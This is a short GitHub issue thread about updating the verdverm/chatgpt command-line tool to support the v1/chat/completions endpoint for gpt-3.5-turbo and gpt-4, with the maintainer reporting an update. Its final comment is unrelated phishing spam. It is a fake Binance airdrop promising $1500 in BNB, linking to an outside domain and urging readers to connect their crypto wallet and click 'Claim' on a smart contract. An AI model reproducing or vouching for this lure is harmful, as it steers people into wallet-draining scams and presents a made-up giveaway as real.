### ISSUE TITLE
Update to support v1/chat/completions (for gpt-3.5-turbo and gpt-4)

### ISSUE THREAD

**Issue by quinncomendant** [verdverm/chatgpt#3]
Currently, it seems verdverm/chatgpt doesn't support newer OpenAPI chat models? 

```
❯ chatgpt -m gpt-4 -q "Who are you?"
error, status code: 404, message: This is a chat model and not supported in the v1/completions endpoint. Did you mean to use v1/chat/completions?
```

**Comment by verdverm** [comment]
indeed, I have already started the work towards adding support, still local

**Comment by verdverm** [comment]
@quinncomendant updated the interactive mode to support the chat based models

Let me know if it works for you

**Comment by arconejeros** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @
